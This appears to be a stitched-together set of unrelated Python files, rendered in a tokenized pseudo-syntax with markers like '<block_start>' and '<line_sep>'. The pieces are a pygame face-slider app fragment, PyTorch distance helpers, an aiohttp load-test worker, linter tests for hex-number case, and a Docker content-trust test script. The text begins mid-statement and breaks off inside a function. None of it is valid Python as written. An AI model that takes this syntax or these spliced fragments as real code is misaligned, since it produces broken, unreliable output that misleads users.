"Hey! You look like "+allPeople[nearestPerson].split(",")[0]+"." 
WHITE] [(800 120) (300 120) (enb_shade enb_shade enb_shade) 30 st BLACK] [(800 360) (300 120) (30 170 30) 44 "GO TO THEM" WHITE] [(800 480) (300 120) (30 170 30) 24 "GO TO RANDOM CELEB" WHITE]]<for_stmt>button button_data<block_start>button_surface=pygame.surface.Surface(button[1])<line_sep>pygame.draw.rect(button_surface button[2] [5 5 button[1][0]-10 button[1][1]-10] 0)<line_sep>font=pygame.font.SysFont("Helvetica" button[3])<line_sep>b_text=font.render(button[4] 1 button[5])<line_sep>b_text_rect=b_text.get_rect(center=(button[1][0]/2 button[1][1]/2))<line_sep>button_surface.blit(b_text b_text_rect)<line_sep>screen.blit(button_surface button[0])<block_end><if_stmt>transitionTimes[0]<ge>0<block_start>w=290<times>(frameTimer-transitionTimes[0])/(transitionTimes[1]-transitionTimes[0])<line_sep>progress_bar_surface=pygame.surface.Surface((w 25))<line_sep>progress_bar_surface.fill((0 150 0))<line_sep>screen.blit(progress_bar_surface (805 125))<block_end>image_surface=pygame.surfarray.make_surface(calculatedImage)<line_sep>bigger=pygame.transform.scale(image_surface (500 500))<line_sep>screen.blit(bigger (300 0))<if_stmt>misspelledTimer<ge>1<block_start>y=5<if_stmt>misspelledTimer<l>60<block_start>y=-115+120<times>(0.5+math.cos((misspelledTimer-60)/60.0<times>math.pi)<times>0.5)<block_end>screen.blit(oops_image (805 y))<block_end><block_end># return misspelledTimer. how many frames the misspelled warning should show up. I know, it's weird and dumb.
<def_stmt>go_to_celeb c<block_start>celeb_choice=string_to_celeb(enteredName)<if_stmt>c<ge>0<block_start>celeb_choice=c<block_end><if_stmt>celeb_choice<eq>-1<block_start><return>800<block_end><else_stmt><block_start>slider_settings=celebSliders[celeb_choice]<if_stmt>approach_settings[1]<eq>1<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]<augadd>slider_settings[i]-settings[i]<times>approach_settings[0]<block_end><block_end><else_stmt><block_start>transitionKeyFrames[0]=settings.copy()<line_sep>transitionKeyFrames[1]=settings.copy()<for_stmt>i range(DENSE_SIZE)<block_start>transitionKeyFrames[1 i]<augadd>slider_settings[i]-settings[i]<times>approach_settings[0]<block_end>transitionTimes[0]=frameTimer-1<line_sep>transitionTimes[1]=frameTimer-1+100<times>(1-approach_settings[1])# really bad magic numbers oh well
<block_end><block_end><return>0<block_end>pygame.init()<line_sep>slides=[]<for_stmt>i range(VISIBLE_COMPONENTS)<block_start>eigen="%.4f"%eigenvalues[i]<line_sep>slides.append(Slider(i 3 -3 (i%2)<times>150 (i<floordiv>2)<times>48+60 150 48))<block_end>approachSlides=[]<for_stmt>i range(2)<block_start>approachSlides.append(ApproachSlider(i 1 0 800 240+60<times>i 300 60))<block_end>screen=pygame.display.set_mode((1100 600))<line_sep>running=<true><line_sep># OPTIONAL SPECIAL CHILD CREATION
# create_special_children(0,1,"speshCaryD")
# for i in range(0,2):
# create_special_children(i,2,"speshTwo")
# create_child_grid(0,6,"speshGrid")
# create_family_tree(0,12,"speshFamilyHuge")
# END OF OPTIONAL SPECIAL CHILD CREATION
<while_stmt>running<block_start>shouldICalculateImage=<false><line_sep>frameTimer<augadd>1<line_sep>misspelledTimer=max(0 misspelledTimer-1)<for_stmt>event pygame.event.get()# Check for KEYDOWN event; KEYDOWN is a constant defined in pygame.locals, which we imported earlier
<block_start><if_stmt>event.type<eq>KEYDOWN# If the Esc key has been pressed set running to false to exit the main loop
<block_start><if_stmt>event.key<eq>K_LSHIFT<or>event.key<eq>K_RSHIFT<block_start>isShiftPressed=<true><block_end><elif_stmt>event.key<eq>K_ESCAPE<block_start>running=<false><block_end><elif_stmt>enteringName<block_start>k=event.key<line_sep>isLetter=ord('a')<le>k<le>ord('z')<if_stmt>isLetter<or>k<eq>ord('-')<or>k<eq>ord(' ')<or>k<eq>ord('\'')<block_start>ch=event.unicode<if_stmt>isShiftPressed<and>isLetter<block_start>ch=ch.upper()<block_end>enteredName=enteredName+ch<block_end><if_stmt>len(enteredName)<ge>1<and>(k<eq>K_BACKSPACE<or>k<eq>K_DELETE)<block_start>enteredName=enteredName[0:-1]<block_end><if_stmt>k<eq>K_RETURN<block_start>enteringName=<false><line_sep>misspelledTimer=go_to_celeb(-1)<line_sep>shouldICalculateImage=<true><block_end><block_end><block_end># Check for QUIT event; if QUIT, set running to false
<elif_stmt>event.type<eq>KEYUP<block_start><if_stmt>event.key<eq>K_LSHIFT<or>event.key<eq>K_RSHIFT<block_start>isShiftPressed=<false><block_end><block_end><elif_stmt>event.type<eq>QUIT<block_start>running=<false><block_end><elif_stmt>event.type<eq>pygame.MOUSEBUTTONDOWN<block_start>mouse_loc=pygame.mouse.get_pos()<if_stmt>event.button<eq>4<or>event.button<eq>5<block_start>dire=(event.button-4.5)<times>2<if_stmt>mouse_loc[0]<l>300<and>60<le>mouse_loc[1]<l>540<block_start>i=(mouse_loc[0]<floordiv>150)+((mouse_loc[1]-60)<floordiv>48)<times>2+scrollPosition<line_sep>settings[i]<augsub>0.2<times>dire<line_sep>shouldICalculateImage=<true><block_end><else_stmt><block_start>scrollPosition=min(max(scrollPosition+2<times>int(dire) 0) denseData.shape[1]-VISIBLE_COMPONENTS)<for_stmt>i range(VISIBLE_COMPONENTS)<block_start>slides[i].val=settings[i+scrollPosition]<block_end><block_end><block_end><else_stmt><block_start>enteringName=<false><if_stmt>mouse_loc[0]<l>300<block_start><if_stmt>mouse_loc[1]<l>60<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]=np.random.normal(0 1 1)<block_end>shouldICalculateImage=<true><line_sep>enteredName=""<block_end><elif_stmt>mouse_loc[1]<ge>540<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]=0<block_end>shouldICalculateImage=<true><line_sep>enteredName=""<block_end><else_stmt><block_start>i=(mouse_loc[0]<floordiv>150)+((mouse_loc[1]-60)<floordiv>48)<times>2<line_sep>slides[i].hit=<true><block_end><block_end><elif_stmt>mouse_loc[0]<ge>800<block_start><if_stmt>mouse_loc[1]<l>120<block_start><for_stmt>i range(DENSE_SIZE)<block_start>settings[i]<augmul>-1<block_end>shouldICalculateImage=<true><line_sep>misspelledTimer=0<line_sep>enteredName=""<block_end><elif_stmt>mouse_loc[1]<l>240<block_start>enteringName=<true><line_sep>misspelledTimer=0<line_sep>enteredName=""<block_end><elif_stmt>240<le>mouse_loc[1]<l>360<block_start>i=((mouse_loc[1]-240)<floordiv>60)<line_sep>approachSlides[i].hit=<true><block_end><elif_stmt>mouse_loc[1]<ge>480<block_start>c=np.random.randint(denseData.shape[0])<line_sep>go_to_celeb(c)<line_sep>shouldICalculateImage=<true><line_sep>enteredName=allPeople[c].split(",")[0]<block_end><elif_stmt>mouse_loc[1]<ge>360<block_start>misspelledTimer=go_to_celeb(-1)<line_sep>shouldICalculateImage=<true><block_end><block_end><block_end><block_end><elif_stmt>event.type<eq>pygame.MOUSEBUTTONUP<block_start><for_stmt>s slides<block_start>s.hit=<false><block_end><for_stmt>a_s approachSlides<block_start>a_s.hit=<false><block_end><block_end><block_end><if_stmt>transitionTimes[0]<ge>0<block_start>proportion_through=min(max((frameTimer-transitionTimes[0])/(transitionTimes[1]-transitionTimes[0]) 0) 1)<if_stmt>frameTimer<ge>transitionTimes[1]<block_start>proportion_through=1<line_sep>transitionTimes[:]=-1<block_end>settings=transitionKeyFrames[0]+proportion_through<times>(transitionKeyFrames[1]-transitionKeyFrames[0])<line_sep>shouldICalculateImage=<true><block_end><else_stmt><block_start><for_stmt>s slides<block_start><if_stmt>s.hit<block_start>s.move()<line_sep>shouldICalculateImage=<true><block_end><block_end><block_end><for_stmt>a_s approachSlides<block_start><if_stmt>a_s.hit<block_start>a_s.move()<block_end><block_end><if_stmt>shouldICalculateImage<block_start>calculatedImage,nearestPerson=calculate_image(settings)<block_end>screen.fill(BLACK)<for_stmt>s slides<block_start>s.draw()<block_end><for_stmt>a_s approachSlides<block_start>a_s.draw()<block_end>draw_buttons()<line_sep>pygame.display.flip()<block_end>
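The slider logic above is a PCA-style projection: get_celeb_sliders divides the projected latent code by the eigenvalues, and calculate_image multiplies them back before summing the weighted eigenvectors. A minimal numpy restatement, with random stand-ins for the arrays loaded from disk, is:

import numpy as np

dense_size = 300
eigenvalues = np.random.rand(dense_size) + 0.1
eigenvectors = np.linalg.qr(np.random.randn(dense_size, dense_size))[0]  # well-conditioned stand-in
mean_data = np.zeros(dense_size)
latent = np.random.randn(dense_size)

inv = np.linalg.pinv(eigenvectors)
sliders = np.matmul(latent - mean_data, inv) / eigenvalues           # mirrors get_celeb_sliders
reconstructed = mean_data + (sliders * eigenvalues) @ eigenvectors   # mirrors calculate_image's real_settings
assert np.allclose(reconstructed, latent)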
|
''' Setup example scripts run (even without simple_rl fully installed).'''<import_stmt>os<import_stmt>sys<line_sep>parent_dir=os.path.abspath(os.path.join(os.getcwd() os.pardir))<line_sep>sys.path.insert(0 parent_dir)<line_sep>
|
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<line_sep>p1=torch.nn.PairwiseDistance(p=1)<line_sep>p2=torch.nn.PairwiseDistance(p=2)<def_stmt>l1_score vec1 vec2<block_start><return>p1(vec1 vec2)<block_end><def_stmt>l2_score vec1 vec2<block_start><return>p2(vec1 vec2)<block_end><def_stmt>cos_score vec1 vec2<block_start><return>F.cosine_similarity(vec1 vec2)<block_end>
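A brief usage note, assuming the three helpers above are in scope: the L1 and L2 scores are distances (smaller means more similar), while the cosine score is a similarity (larger means more similar).

import torch

a = torch.tensor([[1.0, 0.0, 0.0]])
b = torch.tensor([[0.9, 0.1, 0.0]])
print(l1_score(a, b))   # ~0.20, L1 distance
print(l2_score(a, b))   # ~0.14, L2 distance
print(cos_score(a, b))  # ~0.99, cosine similarity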
|
<import_stmt>asyncio<import_stmt>aiohttp<import_stmt>asyncio_redis<import_from_stmt>config LOG_INTERVAL REQ_KEY KILL_KEY<class_stmt>Child(object)<block_start>"""
Wraps all of the child-process functionality in this class.
"""<def_stmt>__init__ self id url<block_start>self.id=id+"-"+REQ_KEY<line_sep># print(self.id)
# self.connection = redis.Connection()
self.url=url<line_sep>self.loop=asyncio.get_event_loop()<line_sep>self.client=aiohttp.ClientSession(loop=self.loop)<line_sep>self.count=0<block_end># total request/s
<async_keyword><def_stmt>init self<block_start>self.redis_connection=<await>asyncio_redis.Pool.create(poolsize=2)<block_end><async_keyword><def_stmt>hammer self<block_start><while_stmt><true><block_start>connection=<await>self.client.get(self.url)<line_sep>self.count<augadd>1<line_sep><await>connection.release()<block_end><block_end><async_keyword><def_stmt>send_stats self<block_start><while_stmt><true><block_start><await>self.redis_connection.set(self.id str(self.count<floordiv>LOG_INTERVAL))<line_sep>self.count=0<line_sep><await>asyncio.sleep(LOG_INTERVAL)<block_end><block_end><def_stmt>clean_up self<block_start><pass><block_end><async_keyword><def_stmt>listen_for_close self<block_start>subscriber=<await>self.redis_connection.start_subscribe()<line_sep><await>subscriber.subscribe([KILL_KEY])<line_sep>reply=<await>subscriber.next_published()<line_sep># above will block until something is published
self.clean_up()<block_end><def_stmt>start self *funcs<block_start>self.loop.run_until_complete(self.init())<line_sep>asyncio.ensure_future(self.send_stats())<line_sep>asyncio.ensure_future(self.hammer())<line_sep>asyncio.ensure_future(self.listen_for_close())<if_stmt>funcs<block_start><for_stmt>func funcs<block_start>asyncio.ensure_future(func)<block_end><block_end>self.loop.run_forever()<block_end><block_end>
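A minimal sketch of how a worker might be launched, assuming config.py provides LOG_INTERVAL, REQ_KEY and KILL_KEY and that a Redis server is reachable on its default port; the worker id and target URL are placeholders.

if __name__ == "__main__":
    child = Child("worker-1", "http://localhost:8080/")  # placeholder id and target URL
    child.start()  # runs init(), then hammer/send_stats/listen_for_close on the event loop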
|
<import_stmt>pytest<import_from_stmt>wemake_python_styleguide.violations.consistency BadNumberSuffixViolation WrongHexNumberCaseViolation <import_from_stmt>wemake_python_styleguide.visitors.tokenize.primitives WrongNumberTokenVisitor <line_sep>hex_number_templates=['0x{0}' '0xA{0}' '0x{0}2' '0xB{0}1' ]<line_sep>@pytest.mark.parametrize('hex_char' ['a' 'b' 'c' 'd' 'e' 'f'])@pytest.mark.parametrize('number' hex_number_templates)<def_stmt>test_hex_wrong_case parse_tokens assert_errors assert_error_text default_options hex_char number number_sign <block_start>"""Ensures that hex numbers with lowercase digits raise a warning."""<line_sep>real_number=number.format(hex_char)<line_sep>file_tokens=parse_tokens(number_sign(real_number))<line_sep>visitor=WrongNumberTokenVisitor(default_options file_tokens=file_tokens)<line_sep>visitor.run()<line_sep>assert_errors(visitor [WrongHexNumberCaseViolation])<line_sep>assert_error_text(visitor real_number)<block_end>@pytest.mark.parametrize('hex_char' ['A' 'B' 'C' 'D' 'E' 'F'])@pytest.mark.parametrize('number' hex_number_templates)<def_stmt>test_hex_correct_case parse_tokens assert_errors default_options hex_char number number_sign <block_start>"""Ensures that hex numbers with uppercase digits do not raise a warning."""<line_sep>file_tokens=parse_tokens(number_sign(number.format(hex_char)))<line_sep>visitor=WrongNumberTokenVisitor(default_options file_tokens=file_tokens)<line_sep>visitor.run()<line_sep>assert_errors(visitor [])<block_end>@pytest.mark.parametrize('hex_char' ['a' 'b' 'c' 'd' 'e' 'f'])@pytest.mark.parametrize('number' hex_number_templates)<def_stmt>test_hex_double_wrong_case parse_tokens assert_errors default_options hex_char number number_sign <block_start>"""Ensures that hex numbers with an uppercase prefix and lowercase digits raise both warnings."""<line_sep>real_number=number.format(hex_char).replace('x' 'X')<line_sep>file_tokens=parse_tokens(number_sign(real_number))<line_sep>visitor=WrongNumberTokenVisitor(default_options file_tokens=file_tokens)<line_sep>visitor.run()<line_sep>assert_errors(visitor [BadNumberSuffixViolation WrongHexNumberCaseViolation ])<block_end>
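For orientation, the cases these tests exercise look roughly like this (a hedged illustration; the exact rules and messages come from wemake-python-styleguide):

GOOD = 0xAB1   # uppercase hex digits: no violation
BAD = 0xab1    # lowercase hex digits: WrongHexNumberCaseViolation
WORSE = 0Xab1  # uppercase 'X' prefix plus lowercase digits: BadNumberSuffixViolation as well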
|
"""
Script that automates trusted pull/pushes on different docker versions.
Usage: python buildscripts/dockertest.py
- assumes that this is run from the root notary directory
- assumes that bin/client already exists
- assumes you are logged in with docker
- environment variables to provide:
- DEBUG=true - produce debug output
- DOCKER_CONTENT_TRUST_SERVER=<notary server url> test against a non-local
notary server
- NOTARY_SERVER_USERNAME=<username> login creds username to notary server
- NOTARY_SERVER_PASSPHRASE=<passwd> login creds password to notary server
- DOCKER_USERNAME=<username> docker hub login username
"""<import_from_future_stmt> print_function<import_from_stmt>collections OrderedDict<import_stmt>atexit<import_stmt>json<import_stmt>os<import_stmt>platform<import_stmt>pwd<import_stmt>re<import_stmt>shutil<import_stmt>subprocess<import_stmt>tarfile<import_from_stmt>tempfile mkdtemp<import_from_stmt>time sleep time<import_stmt>urllib<import_from_stmt>urlparse urljoin<line_sep># Configuration for testing
# please give the full path to the binary (or if it's on your path, just the
# binary name) for these if you do not want them downloaded, otherwise these
# can be ignored. Up to you to make sure you are running the correct daemon
# version.
DOCKERS={}<line_sep># delete any of these if you want to specify the docker binaries yourself
DOWNLOAD_DOCKERS={"1.10":("https://get.docker.com" "docker-1.10.3") "1.11":("https://get.docker.com" "docker-1.11.2") "1.12":("https://get.docker.com" "docker-1.12.1") }<line_sep>NOTARY_VERSION="0.4.1"# only version that will work with docker < 1.13
NOTARY_BINARY="bin/notary"<line_sep># please replace with private registry if you want to test against a private
# registry
REGISTRY="docker.io"<line_sep># please enter your username if it does not match your shell username, or set the
# environment variable DOCKER_USERNAME
REGISTRY_USERNAME=os.getenv("DOCKER_USERNAME" pwd.getpwuid(os.getuid())[0])<line_sep># what you want the testing repo names to be prefixed with
REPO_PREFIX="docker_test"<line_sep># Assumes default docker config dir
DEFAULT_DOCKER_CONFIG=os.path.expanduser("~/.docker")<line_sep># Assumes the trust server will be run using compose if
# DOCKER_CONTENT_TRUST_SERVER is not specified
DEFAULT_NOTARY_SERVER="https://notary-server:4443"<line_sep># please enter a custom trust server location if you do not wish to use a local
# docker-compose instantiation. If testing against Docker Hub's notary server
# or another trust server, please also ensure that this script does not pick up
# incorrect TLS certificates from ~/.notary/config.json by default
TRUST_SERVER=os.getenv('DOCKER_CONTENT_TRUST_SERVER' DEFAULT_NOTARY_SERVER)<line_sep># Assumes the test will be run with `python misc/dockertest.py` from
# the root of the notary repo after binaries are built
# also overrides the notary server location if need be
<if_stmt>TRUST_SERVER<ne>DEFAULT_NOTARY_SERVER<block_start>NOTARY_CLIENT="{client} -s {server}".format(client=NOTARY_BINARY server=TRUST_SERVER)<block_end><else_stmt><block_start>NOTARY_CLIENT="{client} -c cmd/notary/config.json".format(client=NOTARY_BINARY)<block_end>DEBUG=" -D"<if>os.getenv('DEBUG')<else>""<line_sep># ---- setup ----
<def_stmt>download_docker download_dir="/tmp"<block_start>"""
Downloads the relevant docker binaries and sets the docker values
"""<line_sep>system=platform.system()<line_sep>architecture="x86_64"<if_stmt>platform.architecture()[0]<ne>"64bit"<block_start>architecture="i386"<block_end>downloadfile=urllib.URLopener()<for_stmt>version DOWNLOAD_DOCKERS<block_start>domain,binary=DOWNLOAD_DOCKERS[version]<line_sep>tarfilename=os.path.join(download_dir binary+".tgz")<line_sep>extractdir=os.path.join(download_dir binary)<line_sep>DOCKERS[version]=os.path.join(extractdir "docker")<line_sep># we already have that version
<if_stmt>os.path.isfile(os.path.join(extractdir "docker"))<block_start><continue><block_end><if_stmt><not>os.path.isdir(extractdir)<block_start>os.makedirs(extractdir)<block_end><if_stmt><not>os.path.isfile(tarfilename)<block_start>url=urljoin(# as of 1.10 docker downloads are tar-ed due to potentially
# containing containerd etc.
# note that for windows (which we don't currently support),
# it's a .zip file
domain "/".join(["builds" system architecture binary+".tgz"]))<line_sep>print("Downloading" url)<line_sep>downloadfile.retrieve(url tarfilename)<block_end><with_stmt>tarfile.open(tarfilename 'r:gz')<as>tf<block_start><for_stmt>member tf.getmembers()<block_start><if_stmt><not>member.isfile()<block_start><continue><block_end>archfile=tf.extractfile(member)<line_sep>fname=os.path.join(extractdir os.path.basename(member.name))<with_stmt>open(fname 'wb')<as>writefile<block_start>writefile.write(archfile.read())<block_end>os.chmod(fname 0755)<block_end><block_end><if_stmt><not>os.path.isfile(DOCKERS[version])<block_start><raise>Exception("Extracted {tar} to {loc} but could not find {docker}".format(tar=tarfilename loc=extractdir docker=DOCKERS[version]))<block_end><block_end><block_end><def_stmt>verify_notary <block_start>"""
Check that notary is the right version
"""<if_stmt><not>os.path.isfile(NOTARY_BINARY)<block_start><raise>Exception("notary client does not exist: "+NOTARY_BINARY)<block_end>output=subprocess.check_output([NOTARY_BINARY "version"]).strip()<line_sep>lines=output.split("\n")<if_stmt>len(lines)<ne>3<block_start>print(output)<line_sep><raise>Exception("notary version output invalid")<block_end><if_stmt>lines[1].split()[-1]<g>NOTARY_VERSION<block_start>print(output)<line_sep><raise>Exception("notary version too high: must be <= "+NOTARY_VERSION)<block_end><block_end><def_stmt>setup <block_start>"""
Ensure we are set up to run the test
"""<line_sep>download_docker()<line_sep>verify_notary()<line_sep># ensure that we have the alpine image
subprocess.call("docker pull alpine".split())<line_sep># copy the docker config dir over so we don't break anything in real docker
# config directory
os.mkdir(_TEMP_DOCKER_CONFIG_DIR)<line_sep># copy any docker creds over so we can push
configfile=os.path.join(_TEMP_DOCKER_CONFIG_DIR "config.json")<line_sep>shutil.copyfile(os.path.join(DEFAULT_DOCKER_CONFIG "config.json") configfile)<line_sep># always clean up the config file so creds aren't left in this temp directory
atexit.register(os.remove configfile)<line_sep>defaulttlsdir=os.path.join(DEFAULT_DOCKER_CONFIG "tls")<line_sep>tlsdir=os.path.join(_TEMP_DOCKER_CONFIG_DIR "tls")<if_stmt>os.path.exists(tlsdir)<block_start>shutil.copytree(defaulttlsdir tlsdir)<block_end># make sure that the cert is in the right place for local notary
<if_stmt>TRUST_SERVER<eq>DEFAULT_NOTARY_SERVER<block_start>tlsdir=os.path.join(tlsdir "notary-server:4443")<if_stmt><not>os.path.isdir(tlsdir)<block_start><try_stmt><block_start>shutil.rmtree(tlsdir)# in case it's not a directory
<block_end><except_stmt>OSError<as>ex<block_start><if_stmt>"No such file or directory"<not><in>str(ex)<block_start><raise><block_end><block_end>os.makedirs(tlsdir)<block_end>cert=os.path.join(tlsdir "root-ca.crt")<if_stmt><not>os.path.isfile(cert)<block_start>shutil.copyfile("fixtures/root-ca.crt" cert)<block_end><block_end><block_end># ---- tests ----
_TEMPDIR=mkdtemp(prefix="docker-version-test")<line_sep>_TEMP_DOCKER_CONFIG_DIR=os.path.join(_TEMPDIR "docker-config-dir")<line_sep>_TRUST_DIR=os.path.join(_TEMP_DOCKER_CONFIG_DIR "trust")<line_sep>_ENV=os.environ.copy()<line_sep>_ENV.update({# enable content trust and use our own server
"DOCKER_CONTENT_TRUST_SERVER":TRUST_SERVER "DOCKER_CONTENT_TRUST":"1" # environment variables that notary uses
"NOTARY_ROOT_PASSPHRASE":"randompass" "NOTARY_TARGETS_PASSPHRASE":"randompass" "NOTARY_SNAPSHOT_PASSPHRASE":"randompass" # environment variables used by current version of docker
"DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE":"randompass" "DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE":"randompass" # environment variables used by docker 1.8
"DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE":"randompass" "DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE":"randompass" # do not use the default docker config directory
"DOCKER_CONFIG":_TEMP_DOCKER_CONFIG_DIR})<line_sep>_DIGEST_REGEX=re.compile(r"\b[dD]igest: sha256:([0-9a-fA-F]+)\b")<line_sep>_SIZE_REGEX=re.compile(r"\bsize: ([0-9]+)\b")<line_sep>_PULL_A_REGEX=re.compile(r"Pull \(\d+ of \d+\): .+:(.+)@sha256:([0-9a-fA-F]+)")<line_sep>_BUILD_REGEX=re.compile(r"Successfully built ([0-9a-fA-F]+)")<def_stmt>clear_tuf <block_start>"""
Removes the trusted certificates and TUF metadata in ~/.docker/trust
"""<try_stmt><block_start>shutil.rmtree(os.path.join(_TRUST_DIR "trusted_certificates"))<line_sep>shutil.rmtree(os.path.join(_TRUST_DIR "tuf"))<block_end><except_stmt>OSError<as>ex<block_start><if_stmt>"No such file or directory"<not><in>str(ex)<block_start><raise><block_end><block_end><block_end><def_stmt>clear_keys <block_start>"""
Removes the TUF keys in trust directory, since the key format changed
between versions and can cause problems if testing newer docker versions
before testing older docker versions.
"""<try_stmt><block_start>shutil.rmtree(os.path.join(_TRUST_DIR "private"))<block_end><except_stmt>OSError<as>ex<block_start><if_stmt>"No such file or directory"<not><in>str(ex)<block_start><raise><block_end><block_end><block_end><def_stmt>run_cmd cmd fileoutput input=<none><block_start>"""
Takes a string command, runs it while streaming its combined stdout/stderr, and returns the output; raises CalledProcessError (with the output attached) if the command fails.
"""<line_sep>print("$ "+cmd)<line_sep>fileoutput.write("$ {cmd}\n".format(cmd=cmd))<if_stmt>input<is><not><none><block_start>process=subprocess.Popen(cmd.split() env=_ENV stderr=subprocess.STDOUT stdin=subprocess.PIPE stdout=subprocess.PIPE)<line_sep>process.stdin.write(input)<line_sep>process.stdin.close()<block_end><else_stmt><block_start>process=subprocess.Popen(cmd.split() env=_ENV stderr=subprocess.STDOUT stdout=subprocess.PIPE)<block_end>output=""<while_stmt>process.poll()<is><none><block_start>line=process.stdout.readline()<line_sep>print(line.strip("\n"))<line_sep>fileoutput.write(line)<if_stmt>"level=debug"<not><in>line<block_start>output<augadd>line<block_end><block_end>retcode=process.poll()<line_sep>print()<line_sep>fileoutput.write("\n")<if_stmt>retcode<block_start><raise>subprocess.CalledProcessError(retcode cmd output=output)<block_end><return>output<block_end><def_stmt>rmi fout docker_version image tag<block_start>"""
Ensures that an image is no longer available locally to docker.
"""<try_stmt><block_start>run_cmd("{docker} rmi {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag) fout)<block_end><except_stmt>subprocess.CalledProcessError<as>ex<block_start><if_stmt>"could not find image"<not><in>str(ex)<block_start><raise><block_end><block_end><block_end><def_stmt>assert_equality actual expected<block_start>"""
Assert equality, print nice message
"""<assert_stmt>actual<eq>expected "\nGot : {0}\nExpected: {1}".format(repr(actual) repr(expected))<block_end><def_stmt>pull fout docker_version image tag expected_sha<block_start>"""
Pulls an image using docker, and asserts that the sha is correct. Make
sure it is untagged first.
"""<line_sep>clear_tuf()<line_sep>rmi(fout docker_version image tag)<line_sep>output=run_cmd("{docker}{debug} pull {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag debug=DEBUG) fout)<line_sep>sha=_DIGEST_REGEX.search(output).group(1)<line_sep>assert_equality(sha expected_sha)<block_end><def_stmt>push fout docker_version image tag<block_start>"""
Tags an image with the docker version and pushes it. Returns the sha and
expected size.
"""<line_sep>clear_tuf()<line_sep># tag image with the docker version
run_cmd("{docker} tag alpine {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag) fout)<line_sep># push!
output=run_cmd("{docker}{debug} push {image}:{tag}".format(docker=DOCKERS[docker_version] image=image tag=tag debug=DEBUG) fout)<line_sep>sha=_DIGEST_REGEX.search(output).group(1)<line_sep>size=_SIZE_REGEX.search(output).group(1)<line_sep># sleep for 1s after pushing, just to let things propagate :)
sleep(1)<line_sep># list
targets=notary_list(fout image)<for_stmt>target targets<block_start><if_stmt>target[0]<eq>tag<block_start>assert_equality(target [tag sha size "targets"])<block_end><block_end><return>sha size<block_end><def_stmt>get_notary_usernamepass <block_start>"""
Gets the username password for the notary server
"""<line_sep>username=os.getenv("NOTARY_SERVER_USERNAME")<line_sep>passwd=os.getenv("NOTARY_SERVER_PASSPHRASE")<if_stmt>username<and>passwd<block_start><return>username+"\n"+passwd+"\n"<block_end><return><none><block_end><def_stmt>notary_list fout repo<block_start>"""
Calls notary list on the repo and returns a list of lists of tags, shas,
sizes, and roles.
"""<line_sep>clear_tuf()<line_sep>output=run_cmd("{notary}{debug} -d {trustdir} list {gun}".format(notary=NOTARY_CLIENT trustdir=_TRUST_DIR gun=repo debug=DEBUG) fout input=get_notary_usernamepass())<line_sep>lines=output.strip().split("\n")<assert_stmt>len(lines)<ge>3 "not enough targets"<line_sep><return>[line.strip().split()<for>line lines[2:]]<block_end><def_stmt>test_build fout image docker_version<block_start>"""
Build from a simple Dockerfile and ensure it works with DCT enabled
"""<line_sep>clear_tuf()<line_sep># build
# simple dockerfile to test building with trust
dockerfile="FROM {image}:{tag}\nRUN sh\n".format(image=image tag=docker_version)<line_sep>tempdir_dockerfile=os.path.join(_TEMPDIR "Dockerfile")<with_stmt>open(tempdir_dockerfile 'wb')<as>ftemp<block_start>ftemp.write(dockerfile)<block_end>output=run_cmd("{docker}{debug} build {context}".format(docker=DOCKERS[docker_version] context=_TEMPDIR debug=DEBUG) fout)<line_sep>build_result=_BUILD_REGEX.findall(output)<assert_stmt>len(build_result)<ge>0 "build did not succeed"<block_end><def_stmt>test_pull_a fout docker_version image expected_tags<block_start>"""
Pull -A on an image and ensure that all the expected tags are present
"""<line_sep>clear_tuf()<line_sep># remove every image possible
<for_stmt>tag expected_tags<block_start>rmi(fout docker_version image tag)<block_end># pull -a
output=run_cmd("{docker}{debug} pull -a {image}".format(docker=DOCKERS[docker_version] image=image debug=DEBUG) fout)<line_sep>pulled_tags=_PULL_A_REGEX.findall(output)<line_sep>assert_equality(len(pulled_tags) len(expected_tags))<for_stmt>tag,info expected_tags.iteritems()<block_start>found=[pulled<for>pulled pulled_tags<if>pulled[0]<eq>tag]<assert_stmt>found<line_sep>assert_equality(found[0][1] info["sha"])<block_end><block_end><def_stmt>test_push tempdir docker_version image tag="" allow_push_failure=<false> do_after_first_push=<none><block_start>"""
Tests a push of an image by pushing with this docker version, and asserting
that all the other docker versions can pull it.
"""<if_stmt><not>tag<block_start>tag=docker_version<block_end>filename=os.path.join(tempdir "{0}_{1}_push_{2}").format(time() docker_version tag)<with_stmt>open(filename 'wb')<as>fout<block_start><try_stmt><block_start>sha,size=push(fout docker_version image tag=tag)<block_end><except_stmt>subprocess.CalledProcessError<block_start><if_stmt>allow_push_failure<block_start><return>{"push":"failed, but that was expected"}<block_end><raise><block_end>return_val={"push":{"sha":sha "size":size}}<if_stmt>do_after_first_push<is><not><none><block_start>do_after_first_push(fout image)<block_end><for_stmt>ver DOCKERS<block_start><try_stmt><block_start>pull(fout ver image tag sha)<block_end><except_stmt>subprocess.CalledProcessError<block_start>print("pulling {0}:{1} with {2} (expected hash {3}) failed".format(image tag ver sha))<line_sep><raise><block_end><else_stmt><block_start>return_val["push"][ver]="pull succeeded"<block_end><block_end><return>return_val<block_end><block_end><def_stmt>test_run fout image docker_version<block_start>"""
Runs a simple alpine container to ensure it works with DCT enabled
"""<line_sep>clear_tuf()<line_sep># run
output=run_cmd("{docker}{debug} run -it --rm {image}:{tag} echo SUCCESS".format(docker=DOCKERS[docker_version] image=image tag=docker_version debug=DEBUG) fout)<assert_stmt>"SUCCESS"<in>output "run did not succeed"<block_end><def_stmt>test_docker_version docker_version repo_name="" do_after_first_push=<none><block_start>"""
Initialize a repo with one docker version. Test all other docker
versions against that repo (both pulling and pushing).
"""<if_stmt><not>repo_name<block_start>repo_name="repo_by_{0}".format(docker_version)<block_end>tempdir=os.path.join(_TEMPDIR repo_name)<line_sep>os.makedirs(tempdir)<line_sep>image="{0}/{1}/{2}_{3}-{4}".format(REGISTRY REGISTRY_USERNAME REPO_PREFIX repo_name time())<line_sep>result=OrderedDict([(docker_version test_push(tempdir docker_version image do_after_first_push=do_after_first_push))])<line_sep># push again if we did something after the first push
